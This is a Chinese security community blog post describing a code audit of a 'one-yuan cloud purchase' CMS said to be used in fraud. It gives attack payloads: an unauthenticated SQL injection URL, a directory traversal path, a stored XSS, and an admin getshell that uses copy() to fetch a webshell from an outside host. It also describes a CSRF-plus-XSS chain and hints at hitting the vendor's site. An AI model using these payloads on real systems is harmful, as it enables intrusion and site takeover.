前言

作者：阿皮 (“人人大佬计划”二期学员)

https://www.secquan.org/users/danshenpi

原文地址：https://www.secquan.org/CodeAudit/1069179

上次的文章比较深一点，可能很多同志没有看懂

这次精选了一个web的CMS的漏洞挖掘过程以飨读者

嘿嘿嘿 我依旧是你们亲爱的 API ，许久没能跟各位表哥在一起玩耍，甚是想念！

圈子号都有一层灰了...赶紧擦擦吧！

这次给大家看的是一个曾经风靡一时的一元云购的一套程序。

最近几个诈骗受害的案件都是这个程序或者基于这个程序魔改的！

我就纳闷儿了...这玩意儿现在还在骗人？？于是乎就开始着手挖几个洞。

希望给大家一点新的思路和启发 (取证起来更方便！)

查看结构

system文件夹下有相关代码。我直接给大家看一下洞吧

审计出洞

1.SQL注入一枚

虽然本身是过滤单引号 但是在这里并没有用单引号保护起来 所以 这里是一个注入 ，并且没有验证用户身份，从站外未登陆的情况下即可进行注入。

构造Payload:/?/member/cart/Fastpay&shopid=1*

2.目录遍历漏洞

system/plugin/bom/bom.plugin.php 直接访问即可，后台即便是改了也没什么事情，照样刚！

3.存储型XSS漏洞

由于这套CMS出来的较早了，在此之前被许多小黑挖掘过XSS漏洞，但是....我这个XSS貌似也是0day 哈哈哈 需要晒单功能 这里给大家演示一下 先走一遍流程

把图片地址 改成我们的XSS语句

这时候便把IMG标签闭合了 弹出了1 （触发在后台管理的“晒单查看”）

4.后台GetShell

可能有些人看到后台有上传的地方，其实 这些个上传是没有办法利用的。虽然你可以在后台改格式白名单 但是依旧提不下。这时候呢....插马呗！！~~

由于他过滤单引号 所以这里就不带上单引号了。

来到上传处 写上payload

提交完就完事了~~ 通过copy函数远程写个马就完事了

5.CSRF + XSS GetShell

我们直接用XSS嵌套一个html页面，然后模拟所有的操作就完事了

从修改upload格式插马开始，到模拟访问[/index.php/admin/setting/upload?c=copy("http://www.xxx.com/shell.txt","../inc.php"); ]

直接一些列打过去就完事儿了实在不放心就在最后模拟添加一个管理员就阔以了。

这套CMS并没有过滤CSRF攻击 ，我也不截图了各位表哥的姿势比我骚，哇嘎嘎嘎嘎嘎嘎....需要源码可以跟我说一下（好累喔）

验证漏洞

官网?..嘿嘿嘿..一把梭！！！ 

默认后台地址 /?/admin 懂我的意思把，也可以结合团长新写的骚工具跑一把~

还有更多的洞，比如xss反射，组合拳等等，就不再展开说了。

希望大家在正义之路上，好运连连！

心得

挖洞没有什么捷径，那就是不停的挖不停的专研！

等谁靠谁都没有意义，只能靠自己不断的前进！不择手段的前进！

感谢团长给了这么好的学习机会，也希望更多优秀的大佬加入我们！

单身皮:彼之秀不及吾之皮也~~

关于圈子社区：
圈子社区是一个非盈利,封闭的白帽子技术交流社区。目前成员已有近2000人,拥有业内首个自主研发的实战化靶场,体系化学习和燃爆的交流气氛带你成为真正的大佬，社区专注实战，崇尚技术，如果你也是实战派，请关注我们。
社区地址：(请使用https访问)
https://www.secquan.org

本文始发于微信公众号（Secquan圈子社区）：0day制造机！实战挖穿某知名诈骗云购CMS